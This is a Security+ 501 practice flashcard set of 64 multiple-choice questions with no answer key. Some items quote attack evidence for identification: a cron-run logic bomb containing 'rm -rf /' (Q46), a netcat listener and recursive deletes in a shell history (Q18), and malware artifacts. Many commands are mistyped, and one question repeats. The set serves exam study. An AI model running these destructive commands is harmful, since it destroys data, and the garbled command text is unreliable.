SECURITY+501 2018 Flashcards

Question 1

Q

Multiple organizations operating in the same vertical want to provide seamless wireless access for their
employees as they visit the other organizations. Which of the following should be implemented if all the
organizations use the native 802.1x client on their mobile devices?

A. Shibboleth
B. RADIUS federation
C. SAML
D. OAuth
E. OpenlD connect

Question 2

Q

Upon entering an incorrect password, the logon screen displays a message informing the user that the
password does not match the username provided and is not the required length of 12 characters. Which of the
following secure coding techniques should a security analyst address with the application developers to follow security best practices?

A. Input validation
B. Error handling
C. Obfuscation
D. Data exposure

Question 3

Q

A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements:
*All access must be correlated to a user account.
*All user accounts must be assigned to a single individual.
*User access to the PHI data must be recorded.
*Anomalies in PHI data access must be reported.
*Logs and records cannot be deleted or modified.
Which of the following should the administrator implement to meet the above requirements? (Select THREE).

A. Eliminate shared accounts.
B. Create a standard naming convention for accounts.
C. Implement usage auditing and review.
D. Enable account lockout thresholds.
E. Copy logs in real time to a secured WORM drive.
F. Implement time-of-day restrictions.
G. Perform regular permission audits and reviews.

Question 4

Q

An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router?

A. WPA+CCMP
B. WPA2+CCMP
C. WPA+TKIP
D. WPA2+TKIP

Question 5

Q

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use?
(Select TWO)

A. TOTP
B. SCP
C. FTP over a non-standard port
D. SRTP
E. Certificate-based authentication
F. SNMPv3

Question 6

Q

Which of the following threat actors is MOST likely to steal a company’s proprietary information to gain a
market edge and reduce time to market?

A. Competitor
B. Hacktivist
C. Insider
D. Organized crime

Question 7

Q

Which of the following BEST describes an important security advantage yielded by implementing vendor
diversity?

A. Sustainability
B. Homogeneity
C. Resiliency
D. Configurability

Question 8

Q

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS?

A. Pivoting
B. Process affinity
C. Buffer overflow
D. XSS

Question 9

Q

Which of the following differentiates a collision attack from a rainbow table attack?

A. A rainbow table attack performs a hash lookup.
B. A rainbow table attack uses the hash as a password.
C. In a collision attack, the hash and the input data are equivalent.
D. In a collision attack, the same input results in different hashes.

Question 10

Q

A security analyst observes the following events in the logs of an employee workstation:
1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level.
1/23 1:07:09 1034 The scan is completed. No detections were found.
The security analyst reviews the file system and observes the following:
C:>dir
C:\Users\user\temp
1/23 1:07:02 oasdfkh.hta
1/23 1:07:02 update.bat
1/23 1:07:02 msg.txt
Given the information provided, which of the following MOST likely occurred on the workstation?

A. Application whitelisting controls blocked an exploit payload from executing.
B. Antivirus software found and quarantined three malware files.
C. Automatic updates were initiated but failed because they had not been approved.
D. The SIEM log aged was not tuned properly and reported a false positive

Question 11

Q

A security technician has been receiving alerts from several servers that indicate load balancers have had a
significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk
space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the
servers has increased. Which of the following is the MOST likely cause of the decreased disk space?

A. Misconfigured devices
B. Logs and events anomalies
C. Authentication issues
D. Unauthorized software

Question 12

Q

A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main
culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved?
(Select TWO)

A. MITM attack
B. DoS attack
C. DLL injection
D. Buffer overflow
E. Resource exhaustion

Question 13

Q

Which of the following is used to validate the integrity of data?

A. CBC
B. Blowfish
C. MD5
D. RSA

Question 14

Q

A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The
user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely
the case?

A. The certificate has expired
B. The browser does not support SSL
C. The user’s account is locked out
D. The VPN software has reached the seat license maximum

Question 15

Q

When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal?

A. Infrastructure
B. Platform
C. Software
D. Virtualization

Question 16

Q

A company was recently audited by a third party. The audit revealed the company’s network devices were
transferring files in the clear. Which of the following protocols should the company use to transfer files?

A. HTTPS
B. LDAPS
C. SCP
D. SNMPv3

Question 17

Q

A security analyst is acquiring data from a potential network incident. Which of the following evidence is the
analyst MOST likely to obtain to determine the incident?

A. Volatile memory capture
B. Traffic and logs
C. Screenshots
D. System image capture

Question 18

Q

A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for
analysis. The analyst notices that an internal host had a socket established with anther internal host over a nonstandard port. Upon investigation, the origin host that initiated the socket shows this output:
usera@host>history
mkdir /local/usr/bin/somedirectory
nc -1 192.168.5.1 -p 9856
ping -c 30 8.8.8.8 -a 600
rm /etc/dir2/somefile
rm -rm /etc/dir2/
traceroute 8.8.8.8
pakill pid 9487
usera@host>
Given the above output, which of the following commands would have established the questionable socket?
A. traceroute 8.8.8.8
B. ping -1 30 8.8.8.8 -a 600
C. nc -1 192.168.5.1 -p 9856
D. pskill pid 9487

Question 19

Q

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which
of the following should the administrator use? (Select TWO)

A. TOPTP
B. SCP
C. FTP over a non-standard pot
D. SRTP
E. Certificate-based authentication
F. SNMPv3

Question 20

Q

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items.
Which of the following BEST describe why this has occurred? (Select TWO)

A. Privileged-user certificated were used to scan the host
B. Non-applicable plug ins were selected in the scan policy
C. The incorrect audit file was used
D. The output of the report contains false positives
E. The target host has been compromised

Question 21

Q

Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in
a third-party software application?

A. Sandboxing
B. Encryption
C. Code signing
D. Fuzzing

Question 22

Q

A network administrator needs to allocate a new network for the R&D group. The network must not be
accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the
following settings should the network administrator implement to accomplish this?

A. Configure the OS default TTL to 1
B. Use NAT on the R&D network
C. Implement a router ACL
D. Enable protected ports on the switch

Question 23

Q

To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed?

A. Least privilege
B. Job rotation
C. Backround checks
D. Separation of duties

Question 24

Q

When attackers use a compromised host as a platform for launching attacks deeper into a company’s network,
it is said that they are:

A. escalating privilege
B. becoming persistent
C. fingerprinting
D. pivoting

Question 25

Q

The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?

A. The password expired on the account and needed to be reset
B. The employee does not have the rights needed to access the database remotely
C. Time-of-day restrictions prevented the account from logging in
D. The employee’s account was locked out and needed to be unlocked

Question 26

Q

An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned
network can be seen sending packets to the wrong gateway. Which of the following network devices is
misconfigured and which of the following should be done to remediate the issue?

A. Firewall; implement an ACL on the interface
B. Router; place the correct subnet on the interface
C. Switch; modify the access port to trunk port
D. Proxy; add the correct transparent interface

Question 27

Q

A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFIenabled baby monitor while the baby’s parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor?

A. Outdated antivirus
B. WiFi signal strength
C. Social engineering
D. Default configuration

Question 28

Q

A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use?

A. Wildcard certificate
B. Extended validation certificate
C. Certificate chaining
D. Certificate utilizing the SAN file

Question 29

Q

Which of the following refers to the term used to restore a system to its operational state?

A. MTBF
B. MTTR
C. RTO
D. RPO

Question 30

Q

A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specific version of a technology the company uses to support many critical application. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?

A. Penetration test
B. Vulnerability scan
C. Active reconnaissance
D. Patching assessment report

Question 31

Q

An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Sect TWO)

A. TACACS+
B. CHAP
C. LDAP
D. RADIUS
E. MSCHAPv2

Question 32

Q

An active/passive configuration has an impact on:

A. confidentiality
B. integrity
C. availability
D. non-repudiation

Question 33

Q

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML
iframe with JavaScript code via a web browser?

A. Buffer overflow
B. MITM
C. XSS
D. SQLi

Question 34

Q

Which of the following would provide additional security by adding another factor to a smart card?

A. Token
B. Proximity badge
C. Physical key
D. PIN

Question 35

Q

A security analyst receives an alert from a WAF with the following payload:
var data = " ++ "
Which of the following types of attacks is this?

A. Cross-site request forgery
B. Buffer overflow
C. SQL injection
D. JavaScript data insertion
E. Firewall evasion script

Question 36

Q

Which of the following uses precomputed hashed to guess passwords?

A. Iptables
B. NAT tables
C. Rainbow tables
D. ARP tables

Question 37

Q

A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees.
Which of the following would provide strong security backward compatibility when accessing the wireless
network?

A. Open wireless network and SSL VPN
B. WPA using a preshared key
C. WAP2 using a RADIUS back-end for 802.1x authentication
D. WEP with a 40-bit key

Question 38

Q

In determining when it may be necessary to perform a credentialed scan against a system instead of a noncredentialed scan, which of the following requirements is MOST likely to influence its decisions?

A. The scanner must be able to enumerate the host OS of devices scanner
B. The scanner must be able to footprint the network
C. The scanner must be able to check for open ports with listening services
D. The scanner must be able to audit file system permissions

Question 39

Q

When sending a message using symmetric encryption which of the following must happen FIRST?

A. Exchange encryption keys
B. Establish digital signatures
C. Agree on an encryption method
D. Install digital certificates

Question 40

Q

A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue?

A. SSL
B. CRL
C. PKI
D. ACL

Question 41

Q

After a user reports slow computer performance, a systems administrator detects a suspicious file, which was
installed as part of a freeware software package. The systems administrator reviews the output below:
c:\Windows\system32>netstat -nab
Active Connections
Pronto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe]
TCP 0.0.0.0:445 0.0.0.0 [svchost.exe]
TCP 192.168.1.10:5000 10.37.213.20 wineserver.exe
UDP 192.168.1.10:1900 . SSDPSVR
Based on the above information, which of the following types of malware was installed on the user’s computer?

A. RAT
B. Keylogger
C. Spyware
D. Worm
E. Bot

Question 42

Q

A company has noticed multiple instances of proprietary information to public websites. It has also observed an
increase in the number of email messages sent to random employees containing malicious links and PDFs.
Which of the following changes should the company make to reduce the risks associated with phishing
attacks? (Select TWO)

A. Install an addition firewall
B. Implement a redundant email server
C. Block access to personal email on corporate systems
D. Update the X.509 certificates on the corporate email server
E. Update corporate policy to prohibit access to social media websites
F. Review access violation on the file server

Question 43

Q

A security analyst is investigating a potential reach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact?

A. Launch an investigation to identify the attacking host
B. Initiate the incident response plan
C. Review lessons learned captured in the process
D. Remove malware and restore the system to normal operation

Question 44

Q

Which of the following BEST describes a network-based attack that can allow an attacker to take full control of
a vulnerable host?

A. Remote exploit
B. Application
C. Sniffing
D. Man-in-the-middle

Question 45

Q

Joe, a salesman, was assigned to a new project that requires hi to travel to a client site. While waiting for a
flight, Joe, decides to connect to the airport wireless network without connecting to a VPN,and the sends
confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon
investigation, the company learns Joe’s emails were intercepted. Which of the following MOST likely caused
the data breach?

A. Policy violation
B. Social engineering
C. Insider threat
D. Zero-day attack

Question 46

Q

An information security specialist is reviewing the following output from a Linux server:
user@server:~$ -l
5 * * * * /usr/local/bin.backup.sh
user@server:~$ cat /usr/local/bin/backup.sh
#!/bin/bash
if ! grep –quiet joeuser /etc/passwd
the rm -rf /
fi
Based on the above information, which of the following types of malware was installed on the server?

A. Logic bomb
B. Trojan
C. Backdoor
D. Ransomware
E. Rootkit

Question 47

Q

A company wants to ensure confidential data from storage media is sanitized in such away that the drive
cannot be reused. Which of the following method should the technician use?

A. Shredding
B. Wiping
C. Low-level formatting
D. Repartitioning
E. Overwriting

Question 48

Q

A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of
the following is the FIRST step the forensic expert needs to take the chain of custody?

A. Make a forensic copy
B. Create a hash of the hard rive
C. Recover the hard drive data
D. Update the evidence log

Question 49

Q

An incident response manager has started to gather all the facts related to a SIEM alert showing multiple
systems may have been compromised. The manager has gathered these facts:
The breach is currently indicated on six user PCs
One service account is potentially compromised
Executive management has been notified
In which of the following phases of the IRP is the manager currently working?

A. Recovery
B. Eradication
C. Containment
D. Identification

Question 50

Q

A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site
is a hurricane-affected are and the disaster recovery site is 100mi(161km) away, the company wants to ensure
its business is always operational with the least amount of man hours needed. Which of the following types of
disaster recovery sites should the company implement?

A. Hot site
B. Warm site
C. Cold site
D. Cloud-based site

Question 51

Q

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the
domain controller, the systems administrator needs to provide the domain administrator credentials. Which of
the following account types is the system administrator using?

A. Shared accounts
B. Guest account
C. Service account
D. User account

Question 52

Q

User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of
the following would allow the users of the separate PKIs to work together without connection errors?

A. Trust model
B. Stapling
C. Intermediate CA
D. Key escrow

Question 53

Q

A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the
requirement, which of the following should the security analyst do to MINIMIZE the risk?

A. Enable CHAP
B. Disable NTLM
C. Enable Kerebos
D. Disable PAP

Question 54

Q

An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented?

A. Use a camera for facial recognition
B. Have users sign their name naturally
C. Require a palm geometry scan
D. Implement iris recognition

Question 55

Q

A security analyst is reviewing an assessment report that includes software versions, running services,
supported encryption algorithms, and permission settings. Which of the following produced the report?

A. Vulnerability scanner
B. Protocol analyzer
C. Network mapper
D. Web inspector

Question 56

Q

A Chief Information Officer (CIO) asks the company’s security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware
infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE
values warrants a recommendation against purchasing the malware protection?

A. $500
B. $1000
C. $2000
D. $2500

Question 57

Q

The computer resource center issue smartphones to all first-level and above managers. The managers have
the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the
managers installed?

A. Download manager
B. Content manager
C. Segmentation manager
D. Application manager

Question 58

Q

A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees.
Which of the following should the administrator implement?

A. Shared accounts
B. Preshared passwords
C. Least privilege
D. Sponsored guest

Question 59

Q

A recent internal audit is forcing a company to review each internal business unit’s VMs because the cluster
they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?

A. Buffer overflow
B. End-of-life systems
C. System sprawl
D. Weak configuration

Question 60

Q

A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicated it was pushed from the central patch
system.

File: winx86_adobe_upgrade.exe
Hash: 99ac28bede43ab869b853ba62c4ea243
Administrator pulls a report from the patch management system with the following output:
Install Date Package Name Target Device Hash
10/10/2017 java_11.2_x64.exe HQ PC’s 01ab28bbde63aa879b35bba62cdea282
10/10/2017 winx86_adobe_flash_upgrade.exe HQ PC’s 99ac28bede43ab86b853ba62c4ea243

Given the above output, which of the following MOST likely happened?

A. The file was corrupted after it left the patch system
B. The file was infected when the patch manager downloaded it
C. The file was not approved in the application whitelist system
D. The file was embedded with a logic bomb to evade detection

Question 61

Q

Two users must encrypt and transmit large amounts of data between them. Which of the following should they
use to encrypt and transmit the data?

A. Symmetric algorithm
B. Hash function
C. Digital signature
D. Obfuscation

Question 62

Q

A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes
this policy?

A. Physical
B. Corrective
C. Technical
D. Administrative

Question 63

Q

A software developer is concerned about DLL hijacking in an application being written. Which of the following is
the MOST viable mitigation measure of this type of attack?

A. The DLL of each application should be set individually
B. All calls to different DLLs should e hard-coded in the application
C. Access to DLLs from the Windows registry should be disabled
D. The affected DLLs should be renamed to avoid future hijacking

Question 64

Q

A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual
authentication. Which of the following should the engineer implement if the design requires client MAC
addresses to be visible across the tunnel?

A. Tunnel mode IPSec
B. Transport mode VPN IPSec
C. L2TP
D. SSL VPN

Brainscape's Knowledge GenomeTM

SECURITY+501 2018 Flashcards

Brainscape's Knowledge Genome^TM